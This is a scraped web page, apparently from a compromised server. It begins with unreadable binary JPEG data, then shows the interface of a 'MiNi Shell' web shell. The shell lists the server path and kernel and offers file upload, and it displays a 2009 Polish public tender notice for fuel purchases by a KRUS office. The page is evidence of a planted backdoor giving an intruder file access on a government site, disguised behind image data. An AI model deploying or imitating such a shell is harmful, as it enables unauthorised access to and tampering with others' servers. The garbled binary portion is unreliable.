JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090109/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090109/10581-N-2009.html

<p class="kh_header"><b>Zduńska Wola: Bezgotówkowy zakup benzyny bezołowiowej Pb-95 do samochodów służbowych (osobowych) użytkowanych w jednostkach organizacyjnych Placówki Terenowej KRUS w Zduńskiej Woli</b><br>
<b>Numer ogłoszenia: 10581 - 2009; data zamieszczenia: 09.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Kasa Rolniczego Ubezpieczenia Społecznego Placówka Terenowa w Zduńskiej Woli , ul. Żeromskiego 22, 98-220 Zduńska Wola, woj. łódzkie, tel. 043 8233459, faks 043 8233161.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.krus.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Bezgotówkowy zakup benzyny bezołowiowej Pb-95 do samochodów służbowych (osobowych) użytkowanych w jednostkach organizacyjnych Placówki Terenowej KRUS w Zduńskiej Woli.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest bezgotówkowy zakup benzyny bezołowiowej Pb-95 do samochodów służbowych (osobowych) jednostek organizacyjnych Placówki Terenowej KRUS w Zduńskiej Woli.
2.Przewidywana wielkość zamówienia:
1)szacunkowy, sukcesywny zakup paliwa w okresie 36 miesięcy, wynosi łącznie: Pb-95 - 36.000 l,
2)liczba samochodów objęta zamówieniem: 10 szt. samochodów.
3.Sprzedawane Zamawiającemu paliwo powinno spełniać wymagania określone w Rozporządzeniu Ministra Gospodarki i Pracy z dnia 19.10.2005r. w sprawie wymagań jakościowych dla paliw ciekłych (Dz.U. z 2005r. Nr 216, poz.1825 z późniejszymi zmianami).
4.Zakup benzyny odbywać się będzie przede wszystkim na stacjach położonych w granicach administracyjnych miast, w których znajdują się siedziby Placówek Terenowych KRUS, tj.: w Kutnie, w Łasku, w Łęczycy, w Pajęcznie, w Poddębicach, w Sieradzu, w Wieluniu, w Wieruszowie i w Zduńskiej Woli sporadycznie na innych stacjach położonych na terenie całego kraju.
5.Zakup benzyny dokonywany będzie bez gotówki i bez rachunku, za pomocą kart wystawionych na numery rejestracyjne samochodów służbowych Zamawiającego. Karty muszą być zabezpieczone kodem PIN. 
6.Rozliczanie zawartych transakcji odbywać się będzie na podstawie faktur VAT, wystawianych nie częściej niż dwa razy w miesiącu.
7.Należność będzie regulowana przez Zamawiającego w terminie 14 dni od dnia otrzymania faktury VAT.
8.Wykonawca zapewni pełen monitoring transakcji (data, miejsce, ilość, cena 1 litra paliwa i wartość zakupu paliwa po uwzględnieniu oferowanego rabatu, z wyszczególnieniem numeru rejestracyjnego samochodu i nazwiska kierowcy). Kierowca dokonujący transakcji za pomocą karty otrzyma dowód wydania, na którym złoży swój podpis.
9.Nowe karty elektroniczne będą wydawane Zamawiającemu bez dodatkowego wynagrodzenia (bezpłatnie).
10.W przypadku utraty, zniszczenia lub kradzieży karty, Zamawiający zobowiązany będzie do natychmiastowego powiadomienia telefonicznego Wykonawcy, w celu zastrzeżenia utraconej karty oraz dodatkowo do dokonania potwierdzenia zgłoszenia za pomocą fax-u.
11.Zgłoszenia utraty karty będą przyjmowane całodobowo we wszystkie dni tygodnia. Przy każdym zgłoszeniu utraty karty należy podać numer utraconej karty, typ, nazwę Zamawiającego oraz numer rejestracyjny, na który została wystawiona karta. Potwierdzenie fax-em będzie dokonywane wyłącznie w godzinach pracy Zamawiającego. W przypadku utraty karty po godzinach pracy Zamawiającego potwierdzenie fax-em zostanie dokonane niezwłocznie w następnym dniu roboczym.
12.Wykonawca przejmie odpowiedzialność za transakcje bezgotówkowe dokonywane przy użyciu utraconej lub skradzionej karty od momentu przyjęcia telefonicznego zgłoszenia o utracie, zniszczeniu lub kradzieży karty.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 09.13.21.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
1)spełniają warunki określone w Art.22 ust.1 Ustawy PZP, tzn.:
a)posiadają uprawnienia do wykonywania określonej działalności, tj. posiadają uprawnienia do prowadzenia działalności gospodarczej w zakresie obejmującym przedmiot zamówienia w zakresie obrotu paliwami ciekłymi (warunek ten potwierdzą dokumentami wymienionymi w § 9 ust.1 pkt 6, 7),
b)posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępniania potencjału technicznego i osób zdolnych do wykonania zamówienia, tj. Wykonawca musi wykazać, że dysponuje co najmniej jedną stacją benzynową w granicach administracyjnych miast, w których znajdują się siedziby Placówek Terenowych KRUS, tj.: Kutno, Łask, Łęczyca, Pajęczno, Poddębice, Sieradz, Wieluń, Wieruszów i Zduńska Wola oraz co najmniej jedną stację benzynową w miastach wojewódzkich na terenie całego kraju, honorującą wystawione przez Wykonawcę karty płatnicze oraz oferującą paliwo będące przedmiotem zamówienia (warunek ten potwierdzą dokumentem wymienionym w § 9 ust.1 pkt 3),
c)znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia (warunek ten potwierdzą dokumentem wymienionym w § 9 ust.1 pkt 2),
d)nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie Art.24 Ustawy PZP (warunek ten potwierdzą dokumentem wymienionym w § 9 ust.1 pkt 2).
2.Zamawiający oceni spełnienie warunków udziału w postępowaniu, na podstawie dokumentów, oświadczeń i innych materiałów załączonych do oferty, metodą: spełnia / nie spełnia.
3.Wykonawca, który nie spełni któregokolwiek z warunków udziału w postępowaniu, zostanie wykluczony z udziału w postępowaniu odpowiednio na podstawie Art.24 ust.1 lub 2 Ustawy PZP.
4.W przypadku Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia, każdy z nich zobowiązany jest złożyć dokumenty potwierdzające spełnienie warunków udziału w postępowaniu.
5.Zamawiający zawiadomi niezwłocznie Wykonawcę o wykluczeniu z postępowania o udzielenie zamówienia publicznego, podając uzasadnienie faktyczne i prawne.
6.Ofertę Wykonawcy wykluczonego uznaje się za odrzuconą.
7.Zamawiający wezwie Wykonawców, którzy w określonym terminie nie złożyli wymaganych przez Zamawiającego oświadczeń lub dokumentów, lub którzy nie złożyli pełnomocnictw, albo którzy złożyli wymagane przez Zamawiającego oświadczenia i dokumenty zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym terminie, chyba że mimo ich złożenia oferta Wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania. Złożone na wezwanie Zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnianie przez Wykonawcę warunków udziału w postępowaniu oraz spełnianie przez oferowane dostawy wymagań określonych przez Zamawiającego, nie później niż w dniu, w którym upłynął termin składania ofert.
8.Zamawiający wzywa także, w wyznaczonym przez siebie terminie, do złożenia wyjaśnień dotyczących oświadczeń lub dokumentów.
9.Zamawiający odrzuca ofertę, jeżeli wystąpi przynajmniej jedna przesłanka unormowana w Art.89 Ustawy PZP.
10.Zamawiający zawiadamia równocześnie wszystkich Wykonawców o odrzuceniu ofert, podając uzasadnienie faktyczne i prawne.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Wykonawcy przystępujący do postępowania zobowiązani są do złożenia ofert, składających się z następujących oświadczeń lub dokumentów:
1)wypełniony Formularz Oferty - wg wzoru określonego w Załączniku Nr 1 do SIWZ,
2)oświadczenie o spełnianiu warunków określonych w Art.22 ust.1 Ustawy PZP oraz nie podleganiu wykluczeniu z postępowania na podstawie Art.24 ust.1 i 2 Ustawy PZP - wg wzoru określonego w Załączniku Nr 2 do SIWZ,
3)oświadczenie o dysponowaniu stacjami paliw, zawierające wykaz stacji z podaniem lokalizacji na terenie kraju, na których istnieje możliwość zakupu paliwa Pb-95 wg wzoru - Załącznik Nr 3 do SIWZ,
4)oryginał pełnomocnictwa (pełnomocnictw) wg wzoru - Załącznik Nr 4 do SIWZ, jeśli oferta nie jest podpisana przez osoby upoważnione do reprezentowania Wykonawcy lub gdy z innych wymaganych dokumentów nie wynika upoważnienie do reprezentowania, ewentualnie notarialnie potwierdzona za zgodność z oryginałem kopia pełnomocnictwa,
5)zaparafowany lub podpisany Projekt Umowy wg wzoru - Załącznik Nr 5 do SIWZ,
6)aktualny odpis z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawiony/e nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, (w przypadku składania ofert przez podmioty występujące wspólnie, dokument musi być złożony przez każdy podmiot),
7)koncesję na prowadzenie działalności gospodarczej w zakresie obrotu paliwami ciekłymi zgodnie z ustawą z dnia 10 kwietnia 1997r. Prawo energetyczne (Dz.U. z 2006r. Nr 89, poz.625 z późniejszymi zmianami),
8)oświadczenie wskazujące, którą część zamówienia Wykonawca powierzy wykonaniu przez podwykonawców, zgodnie z Art.36 ust.4 Ustawy PZP,
9)jeżeli o zamówienie Wykonawcy ubiegają się wspólnie lub prowadzą działalność w formie spółki cywilnej - dokument potwierdzający ustanowienie przez Wykonawców pełnomocnika do reprezentowania ich w postępowaniu o udzielnie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
2.Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w ust.1 pkt 6, składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony/e nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3.Dokumenty sporządzone w języku obcym są składane wraz z ich tłumaczeniem na język polski, poświadczonym za zgodność przez Wykonawcę.
4.Dokumenty składające się na ofertę mogą być przedstawione w formie oryginałów, albo kserokopii poświadczonych za zgodność z oryginałem przez upoważnionego przedstawiciela Wykonawcy podpisującego ofertę (podpis czytelny lub parafka z pieczęcią imienną).
5.Z postępowania o udzielenie zamówienia wyklucza się Wykonawców, którzy złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 20</li>
<li>2 - Rabat - 80</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.krus.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Kasa Rolniczego Ubezpieczenia Społecznego Placówka Terenowa w Zduńskiej Woli, ul.Żeromskiego 22, 98-220 Zduńska Wola.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.01.2009 godzina 10:00, miejsce: Kasa Rolniczego Ubezpieczenia Społecznego Placówka Terenowa w Zduńskiej Woli, ul.Żeromskiego 22, 98-220 Zduńska Wola, pokój nr 22 (Kancelaria).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com